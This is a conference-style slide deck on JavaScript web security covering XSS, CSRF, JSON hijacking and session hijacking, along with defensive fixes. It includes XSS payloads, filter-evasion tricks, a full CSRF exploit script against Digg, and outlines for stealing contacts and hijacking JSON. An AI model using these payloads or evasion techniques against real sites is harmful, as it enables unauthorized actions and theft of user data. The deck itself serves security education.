JavaScript Security

14,824
-1

Published on

JavaScript, as it is today, is an insecure language. We need to understand it's shortcomings to improve the security of our applications to protect our users.

Published in: Technology
0 Comments
15 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
14,824
On Slideshare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
467
Comments
0
Likes
15
Embeds 0
No embeds

No notes for slide

JavaScript Security

  1. 1. JavaScript Security jason harwig
  2. 2. quot;How dangerous could this silly little toy scripting language running inside a browser be?quot; Jeff Atwood codinghorror.com stackoverflow.com
  3. 3. “JavaScript's biggest weakness is that it is not secure.” douglas crockford
  4. 4. quot;.. nine out of 10 websites still have serious vulnerabilities. . (XSS) as the top vulnerability classquot; WhiteHat Security Website Security Statistic Report
  5. 5. OWASP Top 10 2007 1. XSS 6. Information Leakage 2. Injection Flaws 7. Broken Auth 3. File Exec 8. Insecure Crypto 4. Direct Object 9. Insecure Reference Communications 5. CSRF 10.Failure to restrict URL access
  6. 6. browser limitations
  7. 7. javascript IO • Ajax • Image • iFrame • Source script • Bridge to flash, Java applets
  8. 8. var xhr = new XmlHttpRequest(); xhr.open(...)
  9. 9. NIC Server Google * get or post
  10. 10. var image = new Image(); image.src = url; * can detect connection success failure
  11. 11. NIC Server Google * get requests only | onload | onerror
  12. 12. f = document.createElement('iframe'); f.src = url; document.body.appendChild(f); * only if same domain
  13. 13. NIC Server Google * get requests only
  14. 14. s = document.createElement('script'); s.type = 'text/javascript'; s.src= url; document.body.appendChild(s); * if JSON returned
  15. 15. NIC Server Google * get requests only
  16. 16. f = document.createElement('form'); f.method = 'post'; ... f.submit();
  17. 17. NIC Server Google * get or post
  18. 18. white hat • Mashup / Aggregate content • SSO Solutions • Protect users / application integrity
  19. 19. black hat • XSS • CSRF • JSON hi-jacking • Cookie session hijacking • Internal network scanning • History checking
  20. 20. cross-site scripting
  21. 21. Browser IFrame same origin policy
  22. 22. user input escape it!
  23. 23. XSS Flavors • Type 0 - DOM • Type 1 - Non-Persistant • Type 2 - Persistant
  24. 24. type 0 var p = location.href.params; document.body.innerHTML = p
  25. 25. Type 1 Search: <script>alert('xss');</script>
  26. 26. Type 2 Please enter username: <script>alert('xss');</script>
  27. 27. <c:out value=quot;${var}quot; Your Username: <script>alert('xss');</script> escapeXml=quot;truequot;/>
  28. 28. html filtering
  29. 29. samy is my hero from http://fast.info/myspace/
  30. 30. Friend Requests 7,000 5,250 3,500 1,750 0 12:34pm 1:30am 8:35am 9:30am 10:30am 1:30pm
  31. 31. tag/attribute whitelist <div style=quot;background:url( 'javascript:alert('xss')' )quot;>
  32. 32. 'javascript' stripped <div style=quot;background:url( 'javanscript:alert('xss')' )quot;>
  33. 33. quot; stripped String.fromCharCode(34);
  34. 34. innerHTML stripped eval('document.body.inne' + 'rHTML');
  35. 35. onreadystatechange stripped eval('xmlhttp.onread' + 'ystatechange = callback');
  36. 36. to be continued..
  37. 37. alternatives to escaping?
  38. 38. google caja / ADsafe
  39. 39. attack vectors to prevent?
  40. 40. code evaluation eval('alert(document.cookie)'); (new Function('alert(document.cookie)'))();
  41. 41. code eval continued <iframe src=quot;java�script:alert('xss')quot;> </iframe>
  42. 42. poluting global objects try { throw EvilArrayFunction; } catch (Array) { }
  43. 43. xss lessons • Escape XML
  44. 44. cross site request forgery the new kid
  45. 45. NIC Server Google
  46. 46. Digg.com • “digg” a story while logged in • Cookie authentication • known url, parameters
  47. 47. digg exploit code mf = window.frames[quot;myframequot;]; html = '<form name=quot;diggformquot; action=quot;http://digg.com/diginfullquot; method=quot;postquot;>'; html = html+'<input type=quot;textquot; name=quot;idquot; value=quot;367034quot;/>'; html = html+'<input type=quot;textquot; name=quot;orderchangequot; value=quot;2quot;/>'; html = html+'<input type=quot;textquot; name=quot;categoryquot; value=quot;0quot;/>'; html = html+'<input type=quot;textquot; name=quot;pagequot; value=quot;0quot;/>'; html = html+'<input type=quot;textquot; name=quot;tquot; value=quot;undefinedquot;/>'; html = html+'<input type=quot;textquot; name=quot;rowquot; value=quot;1quot;/>'; html = html+'</form>'; mf.document.body.innerHTML = html; mf.document.diggform.submit(); from http://4diggers.blogspot.com/
  48. 48. Fixes? • Referral checking? • quick cookie expiration? • post?
  49. 49. solved session.setAttribute(quot;tokenquot;, token); <input type=quot;hiddenquot; value=quot;${token}quot;/>
  50. 50. double submit cookie
  51. 51. digg link <a href=quot;javascript:dig([num],[id],[digCheck])quot;>digg it</a>
  52. 52. digg submit js new Ajax.Request(quot;/diginfullquot;, { quot;methodquot;: quot;postquot;, quot;parametersquot;: quot;id=quot; + itemd + quot;&row=quot; + row + quot;&digcheck=quot; + digcheck + quot;&type=quot; + type + quot;&loc=quot; + pagetype });
  53. 53. no diggcheck, no digg
  54. 54. digg.com • Added random hash as post parameter • server verifies request
  55. 55. myspace • used hash in post to add friends • XSS vulnerable so the hash could be retrieved
  56. 56. HDIV • HTTP Data Integrity Validator
  57. 57. rsnake joins twitter
  58. 58. crossdomain.xml <?xml version=quot;1.0quot; encoding=quot;UTF-8quot;?> <cross-domain-policy xmlns:xsi=quot;http://www.w3.org/2001/ XMLSchema-instancequot; xsi:noNamespaceSchemaLocation=quot;http:// www.adobe.com/xml/schemas/PolicyFile.xsdquot;> <allow-access-from domain=quot;*.twitter.comquot; /> <site-control permitted-cross-domain-policies=quot;master-onlyquot;/> <allow-http-request-headers-from domain=quot;*.twitter.comquot; headers=quot;*quot; secure=quot;truequot;/> </cross-domain-policy>
  59. 59. http://www.yourminis.com/search_minis.aspx?q=XSS
  60. 60. stealing your gmail contacts
  61. 61. google contacts url contacts?out=js&callback=google
  62. 62. responseText google ({ Success: true, Errors: [], Body: { Contacts: [ { id, email, etc. } ] } });
  63. 63. google’s solution? • responseXml
  64. 64. lessons • Protect high value forms • CANNOT be stopped if site is vulnerable to XSS
  65. 65. json hijacking
  66. 66. new Ajax.Request('secretStuff', { onSuccess: doWork }); // server responds with [ { sensitive_info: '...' }, { sensitive_info: '...' } ]
  67. 67. So how do I do it? • Override Array • Source script
  68. 68. demo
  69. 69. solved /*-secure- [ { sensitive_info: '...' }, { sensitive_info: '...' } ] */
  70. 70. “solved” continued • protect JSON services behind post
  71. 71. lessons • Many experts recommend JSON services shouldn’t serve sensitive data • use secure comment • responseXml as alternative
  72. 72. Session hijacking
  73. 73. demo
  74. 74. internal network penetration
  75. 75. history hijack
  76. 76. demo
  77. 77. resources quot;Security Now! Podcastquot; quot;Fortifyquot; twit.tv/sn fortifysoftware.com/security- resources/ quot;WhiteHat Securityquot; whitehatsec.com quot;XSS Generatorquot; ha.ckers.org/xss.html quot;Jeremiah Grossman Blogquot; jeremiahgrossman.blogspot.com quot;Samy is my Heroquot; fast.info/myspace quot;Digg Hackquot; 4diggers.blogspot.com quot;HDIVquot; hdiv.org
  78. 78. twitter: jharwig jason.harwig@nearinfinity.com nearinfinity.com/blogs careers@nearinfinity.com 81
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×